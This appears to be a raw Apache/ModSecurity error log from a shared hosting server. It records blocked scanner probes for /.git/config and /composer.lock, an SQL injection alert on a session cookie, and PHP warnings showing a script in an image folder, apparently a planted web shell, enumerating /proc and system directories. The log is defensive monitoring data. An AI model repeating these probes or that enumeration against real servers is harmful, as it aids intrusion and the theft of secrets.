[Mon May 11 21:43:42.892304 2026] [security2:error] [pid 1588898:tid 1590048] [client 45.67.230.75:50245] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: b097e8f3628c1efc5285ffb325ae8003||1778530361||1778530001"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agIxbqFW67LJTsgN3jT9CQAAAAE"], referer: http://la-grande-fabrique.com/?p=4057
[Mon May 11 21:43:42.892608 2026] [security2:error] [pid 1588898:tid 1590048] [client 45.67.230.75:50245] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agIxbqFW67LJTsgN3jT9CQAAAAE"], referer: http://la-grande-fabrique.com/?p=4057
[Mon May 11 21:43:42.892851 2026] [security2:error] [pid 1588898:tid 1590048] [client 45.67.230.75:50245] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agIxbqFW67LJTsgN3jT9CQAAAAE"], referer: http://la-grande-fabrique.com/?p=4057
[Mon May 11 21:44:06.978117 2026] [security2:error] [pid 1516058:tid 1516099] [client 119.28.100.145:51258] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.nearoo.fr"] [uri "/"] [unique_id "agIxhiMeXtzav-mi9SzEUQAAAMk"]
[Mon May 11 21:44:34.382009 2026] [autoindex:error] [pid 1534836:tid 1534895] [client 52.214.31.127:49334] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 21:45:05.045091 2026] [security2:error] [pid 1516058:tid 1516111] [client 47.128.46.80:30438] ModSecurity: Warning. Matched phrase "/composer.lock" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.lock found within REQUEST_FILENAME: /composer.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/composer.lock"] [unique_id "agIxwSMeXtzav-mi9SzEvgAAANU"]
[Mon May 11 21:45:05.045458 2026] [security2:error] [pid 1516058:tid 1516111] [client 47.128.46.80:30438] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/composer.lock"] [unique_id "agIxwSMeXtzav-mi9SzEvgAAANU"]
[Mon May 11 21:45:05.129036 2026] [security2:error] [pid 1516058:tid 1516111] [client 47.128.46.80:30438] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIxwSMeXtzav-mi9SzEvgAAANU"]
[Mon May 11 21:45:43.972328 2026] [security2:error] [pid 1511173:tid 1511181] [client 43.159.57.144:57254] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/chronique-ep-0-lappel-decembre-2020/"] [unique_id "agIx5_jVc-A-CSptvm2GMgAAAEU"]
[Mon May 11 21:45:44.835262 2026] [security2:error] [pid 1534836:tid 1534878] [client 124.156.225.181:38606] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agIx6NeaRXe5lR8y0ZOmWwAAAUc"]
[Mon May 11 21:45:47.257698 2026] [security2:error] [pid 1534836:tid 1534885] [client 124.156.225.181:59888] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agIx69eaRXe5lR8y0ZOmYAAAAU4"], referer: http://www.pole-de-mobilite-regional.com
[Mon May 11 21:45:56.549300 2026] [security2:error] [pid 1516058:tid 1516092] [client 124.156.225.181:39188] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agIx9CMeXtzav-mi9SzFEAAAAMI"], referer: https://www.pole-de-mobilite-regional.com/
[Mon May 11 21:45:56.769266 2026] [security2:error] [pid 1534836:tid 1534876] [client 43.173.1.69:41244] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/nos-services/transmission-familiale-et-lbo/"] [unique_id "agIx9NeaRXe5lR8y0ZOmfQAAAUU"]
[Mon May 11 21:46:11.533758 2026] [core:error] [pid 1590352:tid 1590409] [client 173.252.82.9:33954] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:46:11.533787 2026] [core:error] [pid 1590352:tid 1590409] [client 173.252.82.9:33954] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:46:23.503995 2026] [:error] [pid 1511173:tid 1511187] [client 114.119.159.233:30799] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/webshop/?language=spanish
[Mon May 11 21:47:08.021754 2026] [:error] [pid 1511173:tid 1511199] [client 183.162.197.197:53448] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 21:47:21.836828 2026] [authz_core:error] [pid 1511173:tid 1511186] [client 52.138.31.126:23623] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/Requests/error_log
[Mon May 11 21:47:54.572964 2026] [ssl:error] [pid 1516058:tid 1516114] (EAI 2)Name or service not known: [client 34.162.22.69:42288] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:47:54.573881 2026] [ssl:error] [pid 1516058:tid 1516114] AH01941: stapling_renew_response: responder error
[Mon May 11 21:47:56.310930 2026] [security2:error] [pid 1511173:tid 1511192] [client 43.153.67.21:51844] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.k06.fr"] [uri "/"] [unique_id "agIybPjVc-A-CSptvm2H0QAAAFA"]
[Mon May 11 21:48:41.197464 2026] [authz_core:error] [pid 1511173:tid 1511186] [client 52.138.31.126:23623] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/l10n/error_log
[Mon May 11 21:48:41.327918 2026] [access_compat:error] [pid 1511173:tid 1511186] [client 52.138.31.126:23623] AH01797: client denied by server configuration: /home/labaujue/public_html/wp-content/uploads/wp-statistics/
[Mon May 11 21:48:56.191756 2026] [security2:error] [pid 1511173:tid 1511200] [client 49.51.180.2:34848] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation/mobil-home-excellence-3/"] [unique_id "agIyqPjVc-A-CSptvm2IggAAAFg"]
PHP Warning:  filesize(): stat failed for /etc/rc.d/rc0.d/K15htcacheclean in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /etc/rc.d/rc0.d/K15htcacheclean in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /etc/rc.d/rc0.d/K15httpd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /etc/rc.d/rc0.d/K15httpd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /etc/rc.d/rc0.d/K50netconsole in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /etc/rc.d/rc0.d/K50netconsole in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 21:49:22.236141 2026] [security2:error] [pid 1588898:tid 1588913] [client 1.12.70.96:50108] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agIywqFW67LJTsgN3jT_4gAAAA4"]
[Mon May 11 21:49:23.160955 2026] [authz_core:error] [pid 1511173:tid 1511193] [client 216.73.216.110:9358] AH01630: client denied by server configuration: /home/missmand/public_html/learning/old/main/inc/entity/repository/error_log
PHP Warning:  filesize(): stat failed for /proc/77/task/77/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/77/task/77/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/77/task/77/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/77/task/77/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/77/task/77/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/77/task/77/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 21:49:25.553561 2026] [authz_core:error] [pid 1511173:tid 1511193] [client 216.73.216.110:9358] AH01630: client denied by server configuration: /home/missmand/public_html/learning/old/main/blog/error_log
PHP Warning:  filesize(): stat failed for /proc/224/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/224/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/224/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/224/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/224/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/224/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 21:49:27.955263 2026] [authz_core:error] [pid 1516058:tid 1516110] [client 52.138.31.126:23644] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/block-bindings/error_log
PHP Warning:  filesize(): stat failed for /proc/8005/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/8005/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/8005/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/8005/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/8005/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/8005/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 21:49:36.401378 2026] [authz_core:error] [pid 1511173:tid 1511193] [client 216.73.216.110:9358] AH01630: client denied by server configuration: /home/missmand/public_html/learning/old/main/survey/error_log
PHP Warning:  filesize(): stat failed for /proc/219/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/219/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/219/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/219/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/219/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/219/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/241/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/241/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/241/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/241/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/241/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/241/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 21:49:40.826137 2026] [authz_core:error] [pid 1588898:tid 1588922] [client 216.73.216.110:43233] AH01630: client denied by server configuration: /home/missmand/public_html/learning/old/main/inc/entity/repository/error_log
[Mon May 11 21:49:50.901549 2026] [security2:error] [pid 1511173:tid 1511183] [client 43.156.44.207:33170] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.apoe.fr"] [uri "/mentions.html"] [unique_id "agIy3vjVc-A-CSptvm2JEwAAAEc"]
[Mon May 11 21:49:54.687790 2026] [security2:error] [pid 1516058:tid 1516100] [client 119.28.122.202:50660] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIy4iMeXtzav-mi9SzGPAAAAMo"]
[Mon May 11 21:51:15.297944 2026] [security2:error] [pid 1590352:tid 1590401] [client 45.89.241.232:28823] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIzM61q0G_aXAqWauTtvwAAAIk"], referer: https://www.piregwan-genesis.com/
[Mon May 11 21:51:15.399923 2026] [security2:error] [pid 1516058:tid 1516106] [client 43.166.136.202:33124] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/"] [unique_id "agIzMyMeXtzav-mi9SzGywAAANA"]
[Mon May 11 21:51:21.778499 2026] [security2:error] [pid 1511173:tid 1511182] [client 43.166.136.202:54662] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/"] [unique_id "agIzOfjVc-A-CSptvm2JYwAAAEY"], referer: http://www.maelbailly.fr
[Mon May 11 21:51:26.801972 2026] [security2:error] [pid 1588898:tid 1588914] [client 43.159.145.149:46466] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.manhattan-studio.fr"] [uri "/index.html"] [unique_id "agIzPqFW67LJTsgN3jQAwwAAAA8"]
[Mon May 11 21:52:02.758056 2026] [core:crit] [pid 1588898:tid 1588916] (13)Permission denied: [client 47.128.58.77:45332] AH00529: /home/krakouka/public_html/wordpress/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home/krakouka/public_html/wordpress/' is executable
[Mon May 11 21:52:15.871521 2026] [ssl:error] [pid 1590352:tid 1590392] (EAI 2)Name or service not known: [client 54.216.76.199:54324] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:52:15.871761 2026] [ssl:error] [pid 1590352:tid 1590392] AH01941: stapling_renew_response: responder error
[Mon May 11 21:52:16.298233 2026] [:error] [pid 1516058:tid 1516106] [client 74.7.228.39:33366] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 21:52:29.342496 2026] [security2:error] [pid 1516058:tid 1516095] [client 206.189.6.126:53074] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agIzfSMeXtzav-mi9SzHGwAAAMU"]
[Mon May 11 21:52:29.342735 2026] [security2:error] [pid 1516058:tid 1516095] [client 206.189.6.126:53074] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agIzfSMeXtzav-mi9SzHGwAAAMU"]
[Mon May 11 21:52:29.342985 2026] [security2:error] [pid 1516058:tid 1516095] [client 206.189.6.126:53074] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agIzfSMeXtzav-mi9SzHGwAAAMU"]
[Mon May 11 21:52:29.525297 2026] [security2:error] [pid 1590352:tid 1590401] [client 206.189.6.126:58742] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agIzfa1q0G_aXAqWauTuJwAAAIk"]
